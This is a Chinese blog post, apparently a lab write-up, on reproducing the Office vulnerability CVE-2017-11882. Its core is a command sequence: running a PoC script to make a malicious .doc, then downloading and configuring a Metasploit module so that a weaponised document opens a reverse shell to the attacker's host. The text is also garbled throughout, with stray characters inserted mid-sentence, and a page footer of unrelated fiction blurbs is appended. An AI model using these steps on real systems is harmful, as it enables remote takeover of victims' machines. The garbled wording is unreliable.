Office遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2017-11882)復(fù)現(xiàn)

1.今天看到有復(fù)現(xiàn)的文章弱睦,看了好幾篇決定本地測(cè)試該漏洞

利用工具清單:

a) tcp反彈:kali 172.16.1.204

b) 安裝office2013的系統(tǒng):win7 172.16.253.4

1. Msf 用到的 Poc

2. office2013、激活工具

3. win7旗艦版ISO鏡像

以上工具已經(jīng)打包好锹漱,下載地址:

鏈接:http://pan.baidu.com/s/1o8635Om? 密碼:xl91

Microsoft Office再次爆出內(nèi)存破壞漏洞,CVEID?CVE-2017-11882,攻擊者可以利用此問(wèn)題潘拨,在當(dāng)前登錄用戶的上下文中執(zhí)行任意代碼。失敗的開發(fā)嘗試可能會(huì)導(dǎo)致拒絕服務(wù)條件饶号。

漏洞觸發(fā)的原理http://www.freebuf.com/articles/web/155304.html

受影響版本包括铁追,Office 2016、Office 2013茫船、Office 2010琅束、Office 2007的相關(guān)版本。

POC地址:https://github.com/Ridter/CVE-2017-11882/

分割符--------------------------------------------------------------------

上面都是廢話算谈,進(jìn)入正題

1涩禀、簡(jiǎn)單的生成彈計(jì)算器的doc文件

命令:python Command43b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

生成的doc文件直接打開就可以彈出計(jì)算器了

2、生成可以反彈shell的doc文件

這首先下載metasploit的攻擊模塊

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb

之后移動(dòng)到下面這個(gè)目錄

mv office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat

接著啟動(dòng)metasploit

輸入

use exploit/windows/fileformat/office_ms17_11882

設(shè)置生成的文件名字

set filename bboysoul.doc

設(shè)置主機(jī)ip

set lhost 172.16.1.204

開始攻擊

exploit

回連成功然眼,shell


exit

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 人面猴
    序言:七十年代末艾船,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子高每,更是在濱河造成了極大的恐慌屿岂,老刑警劉巖,帶你破解...
    沈念sama閱讀 206,214評(píng)論 6 481
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件觉义,死亡現(xiàn)場(chǎng)離奇詭異雁社,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)晒骇,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,307評(píng)論 2 382
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門霉撵,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人洪囤,你說(shuō)我怎么就攤上這事徒坡。” “怎么了瘤缩?”我有些...
    開封第一講書人閱讀 152,543評(píng)論 0 341
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵喇完,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我剥啤,道長(zhǎng)锦溪,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 55,221評(píng)論 1 279
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任府怯,我火速辦了婚禮刻诊,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘牺丙。我一直安慰自己则涯,他們只是感情好复局,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,224評(píng)論 5 371
  • 惡毒庶女頂嫁案:這布局不是一般人想出來(lái)的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著粟判,像睡著了一般亿昏。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上档礁,一...
    開封第一講書人閱讀 49,007評(píng)論 1 284
  • 城市分裂傳說(shuō)
    那天角钩,我揣著相機(jī)與錄音,去河邊找鬼事秀。 笑死彤断,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的易迹。 我是一名探鬼主播宰衙,決...
    沈念sama閱讀 38,313評(píng)論 3 399
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼睹欲!你這毒婦竟也來(lái)了供炼?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 36,956評(píng)論 0 259
  • 萬(wàn)榮殺人案實(shí)錄
    序言:老撾萬(wàn)榮一對(duì)情侶失蹤窘疮,失蹤者是張志新(化名)和其女友劉穎袋哼,沒(méi)想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體闸衫,經(jīng)...
    沈念sama閱讀 43,441評(píng)論 1 300
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡涛贯,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,925評(píng)論 2 323
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了蔚出。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片弟翘。...
    茶點(diǎn)故事閱讀 38,018評(píng)論 1 333
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖骄酗,靈堂內(nèi)的尸體忽然破棺而出稀余,到底是詐尸還是另有隱情,我是刑警寧澤趋翻,帶...
    沈念sama閱讀 33,685評(píng)論 4 322
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布睛琳,位于F島的核電站,受9級(jí)特大地震影響踏烙,放射性物質(zhì)發(fā)生泄漏师骗。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,234評(píng)論 3 307
  • 男人毒藥:我在死后第九天來(lái)索命
    文/蒙蒙 一讨惩、第九天 我趴在偏房一處隱蔽的房頂上張望辟癌。 院中可真熱鬧,春花似錦步脓、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,240評(píng)論 0 19
  • 一樁弒父案靴患,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)仍侥。三九已至,卻和暖如春鸳君,著一層夾襖步出監(jiān)牢的瞬間农渊,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,464評(píng)論 1 261
  • 情欲美人皮
    我被黑心中介騙來(lái)泰國(guó)打工或颊, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留砸紊,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 45,467評(píng)論 2 352
  • 代替公主和親
    正文 我出身青樓囱挑,卻偏偏與公主長(zhǎng)得像醉顽,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子平挑,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,762評(píng)論 2 345

推薦閱讀更多精彩內(nèi)容